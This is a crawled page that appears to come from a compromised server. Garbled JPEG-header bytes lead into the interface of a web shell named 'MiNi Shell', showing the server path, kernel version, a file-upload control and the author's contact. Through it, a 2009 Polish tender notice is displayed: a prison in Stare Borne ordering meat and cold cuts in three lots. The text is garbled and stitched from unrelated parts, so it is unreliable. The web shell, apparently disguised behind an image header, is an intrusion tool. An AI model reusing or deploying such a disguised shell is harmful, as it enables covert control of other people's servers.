JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090422/65181-N-2009.html

<p class="kh_header"><b>Bobolice: dostawa mięsa i produktów mięsnych</b><br>
<b>Numer ogłoszenia: 65181 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Starem Bornem , Stare Borne 14, 76-020 Bobolice, woj. zachodniopomorskie, tel. 0-94 3180820, faks 0-94 318 76 80.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa mięsa i produktów mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1: Dostawy mięsa i podrobów z kurczaka
kurczak cały - mięso z kurczaka, cały, mrożony1500 kg,udko z kurczaka  - mięso kurczak - elementy, świeże 700 kg, serca z kurczaka - podroby - serca z kurczaka mrożone, 450 kg,mięso drobiowe oddzielone mechanicznie (MOM) -mrożone 900kg.  
Zadanie nr 2: Dostawy mięsa, podrobów i wędlin wołowych i wieprzowych
schab bez kości - mięso wieprzowe, elementy świeże, 100 kg, mięso wieprzowe klopsowe (stosunek mięsa do tłuszczu 80/20) średnio rozdrobnione, nie poddane obróbce termicznej, bez dodatku przypraw 1.500 kg, mięso wieprzowe gulaszowe (stosunek mięsa do tłuszczu 50/50) -średnio rozdrobnione, nie poddane obróbce termicznej, 1.700 kg,mięso wieprzowe mielone garmażeryjne- drobno rozdrobnione, nie poddane obróbce termicznej, 3800kg.,mięso wołowe  bez kości, kl.I( udziec) - mięso świeże, 100kg.,mięso wołowe drobne (porcje 120-150g.) bez kości, chude kl. II- mięso świeże, 150kg.,mięso mielone wołowe (chude)- mięso świeże, 150kg., 
podgardle wędzone - mięso wieprzowe, elementy świeże, wędzone, 2.000 kg, 
boczek wędzony, mielony- wędlina średnio rozdrobniona, 1000kg.,kiełbasa jarmarczna - wędlina średnio rozdrobniona, 4.500 kg,kiełbasa parówkowa- wędlina parzona,homogenizowana,2.000kg,kiełbasa biała parzona - wędlina parzona, średnio rozdrobniona, 500 kg, kiełbasa mortadela - wędlina homogenizowana, parzona 1.500 kg, kiełbasa mielonka - wędlina parzona, średnio rozdrobniona, 1000 kg, szynka mielona wieprzowa (prasowana) - wędlina drobno rozdrobniona, 500 kg, 
pieczeń wielkopolska  - wyrób blokowy średnio rozdrobniony, 1000 kg,
pasztet wieprzowy - wędlina podrobowa, 1000 kg,
salceson czarny - wędlina podrobowa, 500 kg, salceson biały  - wędlina podrobowa, 800 kg,kaszanka  -  wędlina podrobowa, parzona, 1000 kg, szynka gotowana - wędlina parzona, 50 kg., 
Zadanie nr 3: Dostawy wędlin drobiowych
kiełbasa mortadela - kiełbasa drobiowa, homogenizowana, parzona 100kg., 
kiełbasa szynkowa - wędlina drobiowa, parzona, 50kg.,kurczak faszerowany - wędlina drobiowa, pieczona, 50kg., mielonka drobiowa - wędlina drobiowa, średnio rozdrobniona, parzona 100kg.,mozajka drobiowa - wędlina drobiowa, parzona, 50kg., szynka mielona blok z indyka - wyrób blokowy, średnio rozdrobniony, 100kg.,
pieczeń drobiowa- pieczeń drobiowa, średnio rozdrobniona, 100kg., parówka drobiowa - wędlina drobiowa, homogenizowana, parzona 100kg., pasztet drobiowy - wędlina drobiowa podrobowa, parzona, 1000kg.,polędwica drobiowa - wędlina drobiowa, wysoko wydajna, parzona , 150kg.,Przedstawione wyżej nazwy oznaczają kolejno; przedmiot zamówienia, grupę asortymentową, szacunkowe zapotrzebowanie, Nazwy poszczególnych wędlin i wyrobów podane w opisie przedmiotu zamówienia przyjęły się na polskim rynku w wyniku długoletniego stosowania norm branżowych i w tym rozumieniu zostały użyte.
Mięso świeże i wędliny winny być pakowane w paczki 1-5 kg w modyfikowanej atmosferze MAP.
Kaszanka i salceson (biały i czarny), winny być pakowane w osłonce polamidowej o przekroju 
80-120mm.  
Wszystkie w/w produkty muszą spełniać normy co do jakości jakie wynikają z obowiązujących przepisów polskiego prawa dla produktów żywnościowych, w szczególności z przepisów polskiego prawa dla produktów żywnościowych , w szczególności z przepisów ustawy z dnia 16 grudnia 2005 roku o produktach pochodzenia zwierzęcego (Dz.U. Z 2006roku nr 17, poz. 127 z póź. Zmianami). Podane  ilości są szacunkowe i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłaszania roszczeń z tytułu niezrealizowanych dostaw lub podstawa do odmowy realizacji dostaw. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia wielkości dostaw w zależności od ilości osadzonych oraz wysokości stawki żywieniowej przypadającej na jednego skazanego. Dostawcy będzie przysługiwało prawo do wynagrodzenia wyłącznie za faktycznie dostarczone ilości towaru..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.30-6, 15.11.22.10-1, 15.11.40.00-0, 15.11.31.00-4, 15.11.30.00-3, 15.11.33.00-6, 15.11.30.00-9, 15.13.12.00-7, 15.13.11.30-5, 15.13.11.33-6, 15.13.11.30-2, 15.13.11.34-3, 15.13.11.35-0, 15.13.13.10-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mooga wziąć udział wykonawcy spełniający warunki określone w art.22 ust.1 oraz nie podlegający wykluczeniu na podstawie art.24 ustawy z 29 stycznia 2004r. Prawo zamówień publicznych, oraz spełniający warunki określone w SIWZ
Ocena spełnienia warunków w postępowaniu o zamówienie publiczne dokonywana będzie wg formuły :spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla uznania ważności ofert i w celu  potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:                                                                                                - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert,
  -  oświadczenie o spełnieniu wymagań określonych w art. 22 Ustawy - Prawo zamówień publicznych z wykorzystaniem informacji z załącznika  nr 1,
- oświadczenie, że oferent nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 Ustawy -Prawo zamówień publicznych z wykorzystaniem informacji z załącznika nr  2,
- wypełniony formularz ofertowy według danych zawartych w załączniku nr 3(A, B lub/i C)
- parafowany projekt  umowy - czytelny podpis i pieczęć wykonawcy pod informacją- akceptuję warunki umowy-  z  wykorzystaniem wzoru - załącznik nr 4.
Dokumenty powyższe mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w starem Bornem, stare Borne 14, 76-20 Bobolice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2009 godzina 09:00, miejsce: Sekretariat Zakładu Karnego w Starem Bornem 14, 76-020 Bobolice.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy mięsa i podrobów z kurczaka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kurczak cały - mięso z kurczaka, cały, mrożony1500 kg,udko z kurczaka  - mięso kurczak - elementy, świeże     700 kg,  serca z kurczaka - podroby - serca z kurczaka mrożone, 450 kg,  mięso drobiowe oddzielone mechanicznie (MOM) - mrożone 900 kg..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.30-6, 15.11.22.10-1, 15.11.40.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy mięsa, podrobów i wędlin wołowych i wieprzowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> schab bez kości - mięso wieprzowe, elementy świeże, 100 kg, mięso wieprzowe klopsowe (stosunek mięsa do tłuszczu 80/20) średnio rozdrobnione, nie poddane obróbce termicznej, bez dodatku przypraw 1.500 kg, mięso wieprzowe gulaszowe (stosunek mięsa do tłuszczu 50/50) -średnio rozdrobnione, nie poddane obróbce termicznej, 1.700 kg, mięso wieprzowe mielone - drobno rozdrobnione, nie poddane obróbce termicznej, 3800kg., mięso wołowe  bez kości, kl.I( udziec) - mięso świeże, 100kg., mięso wołowe drobne (porcje 120-150g.) bez kości, chude kl. II- mięso świeże, 150kg., mięso mielone wołowe (chude)- mięso świeże, 150kg.,
podgardle wędzone - mięso wieprzowe, elementy świeże, wędzone, 2.000 kg, boczek wędzony, mielony- wędlina średnio rozdrobniona, 1000kg., kiełbasa jarmarczna - wędlina średnio rozdrobniona, 4.500 kg, kiełbasa parówkowa- wędlina parzona,homogenizowana,2.000kg,kiełbasa biała parzona - wędlina parzona, średnio rozdrobniona, 500 kg, kiełbasa mortadela - wędlina homogenizowana, parzona 1.500 kg,kiełbasa mielonka - wędlina parzona, średnio rozdrobniona, 1000 kg, szynka mielona wieprzowa (prasowana) - wędlina drobno rozdrobniona, 500 kg, 
pieczeń wielkopolska  - wyrób blokowy średnio rozdrobniony, 1000 kg, pasztet wieprzowy  - wędlina podrobowa, 1000 kg, salceson czarny - wędlina podrobowa, 500 kg, salceson biały  - wędlina podrobowa, 800 kg, kaszanka  -  wędlina podrobowa, parzona, 1000 kg, szynka gotowana - wędlina parzona, 50 kg.,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.31.00-4, 15.11.30.00-3, 15.11.33.00-6, 15.11.30.00-9, 15.13.11.30-5, 15.13.11.33-6, 15.13.11.30-2, 15.13.11.34-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawy wędlin drobiowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kiełbasa mortadela - kiełbasa drobiowa, homogenizowana, parzona 100kg., 
kiełbasa szynkowa - wędlina drobiowa, parzona, 50kg., kurczak faszerowany - - wędlina drobiowa, pieczona, 50kg., mielonka drobiowa - wędlina drobiowa, średnio rozdrobniona, parzona 100kg., mozajka drobiowa - wędlina drobiowa, parzona, 50kg., szynka mielona blok z indyka - wyrób blokowy, średnio rozdrobniony, 100kg.,pieczeń drobiowa- pieczeń drobiowa, średnio rozdrobniona, 100kg., parówka drobiowa - wędlina drobiowa, homogenizowana, parzona 100kg., pasztet drobiowy - wędlina drobiowa podrobowa, parzona, 1000kg., polędwica drobiowa - wędlina drobiowa, wysoko wydajna, parzona , 150kg.,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-0, 15.13.13.10-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com